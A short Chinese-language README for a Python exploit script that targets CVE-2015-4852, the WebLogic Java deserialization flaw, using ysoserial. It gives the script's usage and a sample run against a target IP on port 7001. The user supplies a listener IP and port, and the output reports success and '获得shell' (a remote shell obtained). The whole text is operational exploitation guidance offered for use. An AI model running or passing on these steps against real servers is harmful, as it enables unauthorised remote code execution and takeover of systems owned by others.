前提 需要将ysoserial.jar放置于脚本目录之下(将ysoserial-0*.jar重命名为ysoserial.jar),最好使用kali linux执行该脚本
1.使用方法:
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET ip port
2.例:
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
请输入监听ip地址:10.6.214.1
请输入监听端口:7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
执行成功
获得shell